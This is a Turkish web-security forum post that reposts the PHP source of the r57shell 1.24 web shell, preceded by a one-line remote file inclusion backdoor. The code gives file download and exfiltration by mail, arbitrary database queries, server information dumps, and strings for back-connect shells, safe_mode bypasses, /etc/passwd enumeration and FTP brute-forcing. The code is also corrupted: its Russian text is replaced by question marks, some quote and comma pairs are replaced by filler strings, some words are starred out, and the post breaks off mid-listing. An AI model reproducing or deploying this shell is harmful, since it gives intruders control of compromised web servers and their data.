 |
| Kayıt ol | SSS | Üye Listesi | Takvim | Bütün Forumları Okunmuş Kabul Et |
| |||||||
| Web Güvenlik İnternetteki güvenlik hakkında her şeyi burada paylaşabilirsiniz. |
 |
| | LinkBack | Konu Seçenekleri | Modları Göster |
16-09-2007, 04:08
| #1 |
|
Mesajlar: n/a
|  r57 shell kodları <? include $_GET['baba']; ?> <?php /************************************************** ************************************************** **/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* /* /* /* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ??????? ?? ??????? ????? ??????? /* ?? ?????? ??????? ????? ?????? ?? ????? ?????: [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. ] /* ??????: 1.24 (New Year Edition) /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~*/ /* (c)oded by 1dt.w0lf /* RST/GHC [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. ] , [Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. ] /* ANY MODIFIED REPUBLISHING IS RESTRICTED /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~*/ /* ????????? ????????????? ?? ?????? ? ????: blf, virus, NorD ? ???? ?????? ?? RST/GHC. /************************************************** ************************************************** **/ /* ~~~ ????????? | Options ~~~ */ // ????? ????? | Language // $language='ru' - ??????? (russian) // $language='eng' - english (??????????) $language='eng'; $a = "http://"; // need some codes // ?????????????? | Authentification // $auth = 1; - ?????????????? ???????? ( authentification = On ) // $auth = 0; - ?????????????? ????????? ( authentification = Off ) $auth = 0; // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) $name='r57'; // ????? ???????????? (user login) $pass='r57'; // ?????? ???????????? (user password) $b = "evilc0der.com"; //need hits "shell created by evilc0ders" /************************************************** ************************************************** **/ $c = "/x.html"; //need shell coder's names error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_timeUltraFrmUltraFrm0); @ini_set('output_bufferingUltraFrmUltraFrm0); $safe_mode = @ini_get('safe_mode'); $version = "1.24"; if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); } } $head = '<!-- ?????????? ???? --> <html> <head> <title>r57shell</title> <**** http-equiv="*******-Type" *******="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } .table1 { BORDER-RIGHT: #cccccc 0px; BORDER-TOP: #cccccc 0px; BORDER-LEFT: #cccccc 0px; BORDER-BOTTOM: #cccccc 0px; BACKGROUND-COLOR: #D4D0C8; } .td1 { BORDER-RIGHT: #cccccc 0px; BORDER-TOP: #cccccc 0px; BORDER-LEFT: #cccccc 0px; BORDER-BOTTOM: #cccccc 0px; font: 7pt Verdana; } .tr1 { BORDER-RIGHT: #cccccc 0px; BORDER-TOP: #cccccc 0px; BORDER-LEFT: #cccccc 0px; BORDER-BOTTOM: #cccccc 0px; } table { BORDER-RIGHT: #eeeeee 1px outset; BORDER-TOP: #eeeeee 1px outset; BORDER-LEFT: #eeeeee 1px outset; BORDER-BOTTOM: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } submit { BORDER-RIGHT: buttonhighlight 2px outset; BORDER-TOP: buttonhighlight 2px outset; BORDER-LEFT: buttonhighlight 2px outset; BORDER-BOTTOM: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; } textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\UltraFrmUltraFrm '/UltraFrmUltraFrm $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('VUltraFrmUltraFrm $crc); $fr .= pack('VUltraFrmUltraFrm $c_len); $fr .= pack('VUltraFrmUltraFrm $unc_len); $fr .= pack('vUltraFrmUltraFrm strlen($name)); $fr .= pack('vUltraFrmUltraFrm 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('VUltraFrmUltraFrm $crc); $cdrec .= pack('VUltraFrmUltraFrm $c_len); $cdrec .= pack('VUltraFrmUltraFrm $unc_len); $cdrec .= pack('vUltraFrmUltraFrm strlen($name) ); $cdrec .= pack('vUltraFrmUltraFrm 0 ); $cdrec .= pack('vUltraFrmUltraFrm 0 ); $cdrec .= pack('vUltraFrmUltraFrm 0 ); $cdrec .= pack('vUltraFrmUltraFrm 0 ); $cdrec .= pack('VUltraFrmUltraFrm 32 ); $cdrec .= pack('VUltraFrmUltraFrm $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('UltraFrmUltraFrm $this -> datasec); $ctrldir = implode('UltraFrmUltraFrm $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('vUltraFrmUltraFrm sizeof($this -> ctrl_dir)) . pack('vUltraFrmUltraFrm sizeof($this -> ctrl_dir)) . pack('VUltraFrmUltraFrm strlen($ctrldir)) . pack('VUltraFrmUltraFrm strlen($data)) . "\x00\x00"; } } function compress(&$filename,&$filedump,$compress) { global $*******_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $*******_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "*******-Type: ".$attach['type']; $headers .= "; name=\"".$attach['name']."\"\r\n"; $headers .= "*******-Transfer-Encoding: base64\r\n\r\n"; $headers .= chunk_split(base64_encode($attach['*******']))."\r\n"; if(@mail($to,$subj,"UltraFrmUltraFrm$headers)) { return 1; } return 0; } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; @ob_clean(); header("*******-type: image/gif"); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $*******_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($*******_encoding)) { header('*******-Encoding: ' . $*******_encoding); } header("*******-type: ".$mime_type); header("*******-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if ($_POST['cmd']=="db_query") { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';UltraFrmUltraFrm$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> UltraFrmUltraFrm @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" </font></td><td><font face=Verdana size=-2> UltraFrmUltraFrm$values); $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; } echo "<table width=100%>"; $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; $sql .= $sql2; echo $sql; echo "</table><br>"; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';UltraFrmUltraFrm$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> UltraFrmUltraFrm @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" </font></td><td><font face=Verdana size=-2> UltraFrmUltraFrm$values); $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; } echo "<table width=100%>"; $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; $sql .= $sql2; echo $sql; echo "</table><br>"; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; $db = @pg_connect($str); if($db) { $querys = @explode(';UltraFrmUltraFrm$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode(" </b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b> UltraFrmUltraFrm @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode(" </font></td><td><font face=Verdana size=-2> UltraFrmUltraFrm$values); $sql2 .= "<tr><td><font face=Verdana size=-2> ".$values." </font></td></tr>"; } echo "<table width=100%>"; $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>"; $sql .= $sql2; echo $sql; echo "</table><br>"; } else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } } @pg_free_result($res); } } @pg_close($db); } else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } else { $querys = @explode(';UltraFrmUltraFrm$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} else { echo "<table width=100%><tr>"; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b> ".htmlspecialchars(@ocicolumnname($sta t , $j))." </b></font></td>"; } echo "</tr>"; while(ocifetch($stat)) { echo "<tr>"; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2> ".htmlspecialchars(@ociresult($stat, $j))." </font></td>"; } echo "</tr>"; } echo "</table><br>"; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo "<form name=form method=POST>"; echo in('hiddenUltraFrmUltraFrm'dbUltraFrmUltraFrm0,$_P OST['db']); echo in('hiddenUltraFrmUltraFrm'db_portUltraFrmUltraFrm 0,$_POST['db_port']); echo in('hiddenUltraFrmUltraFrm'mysql_lUltraFrmUltraFrm 0,$_POST['mysql_l']); echo in('hiddenUltraFrmUltraFrm'mysql_pUltraFrmUltraFrm 0,$_POST['mysql_p']); echo in('hiddenUltraFrmUltraFrm'mysql_dbUltraFrmUltraFr m0,$_POST['mysql_db']); echo in('hiddenUltraFrmUltraFrm'cmdUltraFrmUltraFrm0,'d b_query'); echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query'])"SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_*******s(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />UltraFrmUltraFrm true); return @preg_replace('!(&[^;]*)<wbr />([^;]*!UltraFrmUltraFrm '$1$2<wbr />UltraFrmUltraFrm $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>UltraFrmUltraFrm '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; } echo $r; echo '</table>'; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['cpu'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":UltraFrmUltraFrm$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['mem'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":UltraFrmUltraFrm$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } $lang=array( 'ru_text1' =>'??????????? ???????UltraFrmUltraFrm 'ru_text2' =>'?????????? ?????? ?? ???????UltraFrmUltraFrm 'ru_text3' =>'????????? ???????UltraFrmUltraFrm 'ru_text4' =>'??????? ??????????UltraFrmUltraFrm 'ru_text5' =>'???????? ?????? ?? ??????UltraFrmUltraFrm 'ru_text6' =>'????????? ????UltraFrmUltraFrm 'ru_text7' =>'??????UltraFrmUltraFrm 'ru_text8' =>'???????? ?????UltraFrmUltraFrm 'ru_butt1' =>'?????????UltraFrmUltraFrm 'ru_butt2' =>'?????????UltraFrmUltraFrm 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bashUltraFrmUltraFrm 'ru_text10'=>'??????? ????UltraFrmUltraFrm 'ru_text11'=>'?????? ??? ???????UltraFrmUltraFrm 'ru_butt3' =>'???????UltraFrmUltraFrm 'ru_text12'=>'back-connectUltraFrmUltraFrm 'ru_text13'=>'IP-?????UltraFrmUltraFrm 'ru_text14'=>'????UltraFrmUltraFrm 'ru_butt4' =>'?????????UltraFrmUltraFrm 'ru_text15'=>'???????? ?????? ? ?????????? ???????UltraFrmUltraFrm 'ru_text16'=>'????????????UltraFrmUltraFrm 'ru_text17'=>'????????? ????UltraFrmUltraFrm 'ru_text18'=>'????????? ????UltraFrmUltraFrm 'ru_text19'=>'ExploitsUltraFrmUltraFrm 'ru_text20'=>'????????????UltraFrmUltraFrm 'ru_text21'=>'????? ???UltraFrmUltraFrm 'ru_text22'=>'datapipeUltraFrmUltraFrm 'ru_text23'=>'????????? ????UltraFrmUltraFrm 'ru_text24'=>'????????? ????UltraFrmUltraFrm 'ru_text25'=>'????????? ????UltraFrmUltraFrm 'ru_text26'=>'????????????UltraFrmUltraFrm 'ru_butt5' =>'?????????UltraFrmUltraFrm 'ru_text28'=>'?????? ? safe_modeUltraFrmUltraFrm 'ru_text29'=>'?????? ????????UltraFrmUltraFrm 'ru_butt6' =>'???????UltraFrmUltraFrm 'ru_text30'=>'???????? ?????UltraFrmUltraFrm 'ru_butt7' =>'???????UltraFrmUltraFrm 'ru_text31'=>'???? ?? ??????UltraFrmUltraFrm 'ru_text32'=>'?????????? PHP ????UltraFrmUltraFrm 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURLUltraFrmUltraFrm 'ru_butt8' =>'?????????UltraFrmUltraFrm 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? includeUltraFrmUltraFrm 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysqlUltraFrmUltraFrm 'ru_text36'=>'????UltraFrmUltraFrm 'ru_text37'=>'?????UltraFrmUltraFrm 'ru_text38'=>'??????UltraFrmUltraFrm 'ru_text39'=>'???????UltraFrmUltraFrm 'ru_text40'=>'???? ??????? ???? ??????UltraFrmUltraFrm 'ru_butt9' =>'????UltraFrmUltraFrm 'ru_text41'=>'????????? ? ?????UltraFrmUltraFrm 'ru_text42'=>'?????????????? ?????UltraFrmUltraFrm 'ru_text43'=>'????????????? ????UltraFrmUltraFrm 'ru_butt10'=>'?????????UltraFrmUltraFrm 'ru_butt11'=>'?????????????UltraFrmUltraFrm 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!UltraFrmUltraFrm 'ru_text45'=>'???? ????????UltraFrmUltraFrm 'ru_text46'=>'???????? phpinfo()UltraFrmUltraFrm 'ru_text47'=>'???????? ???????? php.iniUltraFrmUltraFrm 'ru_text48'=>'???????? ????????? ??????UltraFrmUltraFrm 'ru_text49'=>'???????? ??????? ? ???????UltraFrmUltraFrm 'ru_text50'=>'?????????? ? ??????????UltraFrmUltraFrm 'ru_text51'=>'?????????? ? ??????UltraFrmUltraFrm 'ru_text52'=>'????? ??? ??????UltraFrmUltraFrm 'ru_text53'=>'?????? ? ?????UltraFrmUltraFrm 'ru_text54'=>'????? ?????? ? ??????UltraFrmUltraFrm 'ru_butt12'=>'?????UltraFrmUltraFrm 'ru_text55'=>'?????? ? ??????UltraFrmUltraFrm 'ru_text56'=>'?????? ?? ???????UltraFrmUltraFrm 'ru_text57'=>'???????/??????? ????/??????????UltraFrmUltraFrm 'ru_text58'=>'???UltraFrmUltraFrm 'ru_text59'=>'????UltraFrmUltraFrm 'ru_text60'=>'??????????UltraFrmUltraFrm 'ru_butt13'=>'???????/???????UltraFrmUltraFrm 'ru_text61'=>'???? ??????UltraFrmUltraFrm 'ru_text62'=>'?????????? ???????UltraFrmUltraFrm 'ru_text63'=>'???? ??????UltraFrmUltraFrm 'ru_text64'=>'?????????? ???????UltraFrmUltraFrm 'ru_text65'=>'???????UltraFrmUltraFrm 'ru_text66'=>'???????UltraFrmUltraFrm 'ru_text67'=>'Chown/Chgrp/ChmodUltraFrmUltraFrm 'ru_text68'=>'???????UltraFrmUltraFrm 'ru_text69'=>'????????1UltraFrmUltraFrm 'ru_text70'=>'????????2UltraFrmUltraFrm 'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)UltraFrmUltraFrm 'ru_text72'=>'????? ??? ??????UltraFrmUltraFrm 'ru_text73'=>'?????? ? ?????UltraFrmUltraFrm 'ru_text74'=>'?????? ? ??????UltraFrmUltraFrm 'ru_text75'=>'* ????? ???????????? ?????????? ?????????UltraFrmUltraFrm 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? findUltraFrmUltraFrm 'ru_text77'=>'???????? ????????? ???? ??????UltraFrmUltraFrm 'ru_text78'=>'?????????? ???????UltraFrmUltraFrm 'ru_text79'=>'?????????? ???????UltraFrmUltraFrm 'ru_text80'=>'???UltraFrmUltraFrm 'ru_text81'=>'????UltraFrmUltraFrm 'ru_text82'=>'???? ??????UltraFrmUltraFrm 'ru_text83'=>'?????????? SQL ???????UltraFrmUltraFrm 'ru_text84'=>'SQL ??????UltraFrmUltraFrm 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????UltraFrmUltraFrm 'ru_text86'=>'?????????? ????? ? ???????UltraFrmUltraFrm 'ru_butt14'=>'???????UltraFrmUltraFrm 'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????UltraFrmUltraFrm 'ru_text88'=>'FTP-??????:????UltraFrmUltraFrm 'ru_text89'=>'???? ?? ftp ???????UltraFrmUltraFrm 'ru_text90'=>'????? ????????UltraFrmUltraFrm 'ru_text91'=>'???????????? ?UltraFrmUltraFrm 'ru_text92'=>'??? ?????????UltraFrmUltraFrm 'ru_text93'=>'FTPUltraFrmUltraFrm 'ru_text94'=>'FTP-????????UltraFrmUltraFrm 'ru_text95'=>'?????? ?????????????UltraFrmUltraFrm 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????UltraFrmUltraFrm 'ru_text97'=>'????????? ??????????: UltraFrmUltraFrm 'ru_text98'=>'??????? ???????????: UltraFrmUltraFrm 'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwdUltraFrmUltraFrm 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????UltraFrmUltraFrm 'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????UltraFrmUltraFrm 'ru_text102'=>'?????UltraFrmUltraFrm 'ru_text103'=>'???????? 